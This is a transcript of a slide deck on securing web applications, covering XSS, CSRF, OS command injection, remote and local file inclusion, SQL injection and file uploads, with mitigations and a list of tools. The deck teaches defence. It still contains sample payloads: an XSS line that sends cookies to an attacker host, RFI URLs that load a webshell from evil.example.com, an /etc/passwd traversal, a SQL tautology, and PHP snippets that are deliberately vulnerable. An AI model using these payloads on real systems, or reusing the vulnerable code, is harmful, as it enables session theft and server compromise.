Presentation is loading. Please wait.

Presentation is loading. Please wait.

Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.

Published byMyra Parker Modified over 8 years ago

Similar presentations

Presentation on theme: "Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting."— Presentation transcript:

1 Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting

2 Information security means protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction. Consists of (C I A): * Confidentiality  Ensuring that information is not accessed by unauthorized persons. * Integrity  Ensuring that information is not altered by unauthorized persons in a way that is not detectable by authorized users. * Authentication  Ensuring that users are the persons they claim to be. What do you mean by Information Security??

3 Security in Shopping Mall?? IN BrowseOut

4 XSS vulnerability CSRF vulnerability path Traversal null Byte OS Commanding Local File Inclusion (LFI) Remote File Inclusion (RFI) Information Disclosure SQL Injection file Upload Know your enemy??

5 Persistent ( Stored ) Non-Persistent Non-Persistent Example: –http://server/cgi-bin/testcgi.exe? alert(“Cookie”+document.cookie) http://server/cgi-bin/testcgi.exe? alert(“Cookie”+document.cookie)</SCRIPT –%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e Persistent Example: – document.location= 'http://attackerhost.example/cgi- bin/cookiesteal.cgi?'+document.cookie XSS ?? http://ha.ckers.org/xss.html

6 htmlentities  Convert all applicable characters to HTML entities. htmlspecialchars  Convert special characters to HTML entities. strip_tags  Strip HTML and PHP tags from a string. Prevent XSS (PHP way)?? http://www.xssed.com/ http://www.parosproxy.org/http://www.parosproxy.org/ : detection tool http://w3af.sourceforge.net/http://w3af.sourceforge.net/ : detection tool

7 One Click Attack unauthorized commands are transmitted from a user machine that the website trusts. The following characteristics are common to CSRF: Involve sites that rely on a user's identity Exploit the site's trust in that identity Trick the user's browser into sending HTTP requests to a target site Involve HTTP requests that have side effects Cross-site request forgery (CSRF)?? http://www.owasp.org/index.php/Image:CSRFTester-1.0.zip

8 Several things have to happen for cross-site request forgery to succeed: The attacker must target either a site that doesn't check the referrer header (which is common) or a victim with a browser or plugin bug that allows referrer spoofing (which is rare). The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's e-mail address or password). The attacker must determine the right values for all the form's or URL's inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will fail. The attacker must lure the victim to a Web page with malicious code while the victim is logged in to the target site. Chances of CSRF?? http://www.owasp.org/index.php/Image:CSRFTester-1.0.zip

9 Requiring the client to provide authentication data in the same HTTP Request used to perform any operation with security implications (money transfer, etc) Limiting the lifetime of session cookies Checking the HTTP Referer header Add unique token every time during transactions and generate and verify at server side. Rx CSRF?? http://www.owasp.org/index.php/Image:CSRFTester-1.0.zip

10 used for unauthorized execution of operating system commands result of mixing trusted code and untrusted data attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization, and/or improper calling of external programs executed commands by an attacker will run with the same privileges of the component that executed the command. Sample: $month = $_GET['month']; $year = $_GET['year']; exec ("cal $month $year", $result); print " ";foreach ($result as $r) { print "$r "; } print " "; OS Commanding??

11 Attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code. RFI means executing remotely hosted malicious code at server level. The attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, Javascript to steal the client session cookies). (LFI) In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function. The PHP language has an allow_url_fopen directive, and if enabled it allows filesystem functions to use a URL which allows them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this vulnerability, all user input needs to be validated before being used Terrible RFI/LFI… Careful Please..

12 <?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; include( $color. '.php' ); ?> red blue Terrible RFI/LFI… Careful Please.. http://w3af.sourceforge.net/ /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit /vulnerable.php?COLOR=/etc/passwd%00

13 SQL Injection.. http://w3af.sourceforge.net/ Many web applications take user input from a form Often this user input is used literally in the construction of a SQL query submitted to a database. For example: –SELECT productdata FROM table WHERE productname = ‘user input product name’; A SQL injection attack involves placing SQL statements in the user input E.g. “Search GOLD OR ‘x’ = ‘x”. This input is put directly into the SQL statement within the Web application: –SELECT prodinfo FROM prodtable WHERE prodname = ‘GOLD ‘ OR ‘x’ = ‘x’ –Attacker has now successfully caused the entire database to be returned

14 SQL Injection.. http://w3af.sourceforge.net/ Hackers can : –Add new viagra ad in your website. –Delete your Database/tables/records. –Sell items for free. –Can sell your company information to others. –Can use USERs data for benefit (credit card information etc.) Solution? –Check syntax of input for validity –Have length limits on input –Many SQL injection attacks depend on entering long strings –Scan query string for undesirable word combinations that indicate SQL statements (Insert,Drop,update, delete,select etc). –Limit database permissions and segregate users –Default error reporting often gives away information that is valuable for attackers (table name, field name, etc.). Configure properly.

15 file Upload..Any problem? Mostly nowadays contains a file upload feature, which has a validation but can be used for a person to upload malicious script files and thereby take control of our server. As main countermeasures you can have in mind: Checking the file size. Deny execute permission on the directory where the files are uploaded. Check MIME-TYPE. Check the file extension. Protecting the upload folder with.htaccess with –ExecCGI If possible, upload the files in a directory outside the server root Create a list of accepted mime-typesGenerate a random file name and add the previously generated extension Don’t rely on client-side validation only, since it is not enough. Ideally one should have both server-side and client-side validation implemented.

16 http://wapiti.sourceforge.net/ http://www.cirt.net/nikto2 http://www.nessus.org/ http://www.darknet.org.uk/2007/01/spik e-proxy-application-level-security- assessment/http://www.darknet.org.uk/2007/01/spik e-proxy-application-level-security- assessment/ Helpful tools ??

17 http://www.wikipedia.org/ https://www.owasp.org/ http://www.cert.org/http://www.cert.org/ http://www.cert-in.org.in/http://www.cert-in.org.in/ http://www.metasploit.com http://www.infosecinstitute.com http://www.pentestit.com http://www.sans.org References and Good reading

18 ANY QUESTIONS ?? ?????????

19 Dipankar.Sinha@hungama.com Want to contact later ?

Download ppt "Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting."

Similar presentations

PHP Form and File Handling

PHP Form and File Handling
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
SQL Injection Attacks Prof. Jim Whitehead CMPS 183: Spring 2006 May 17, 2006.

SQL Injection Attacks Prof. Jim Whitehead CMPS 183: Spring 2006 May 17, 2006.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
SQL Injection Attacks CS 183 : Hypermedia and the Web UC Santa Cruz.

SQL Injection Attacks CS 183 : Hypermedia and the Web UC Santa Cruz.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Similar presentations

Ads by Google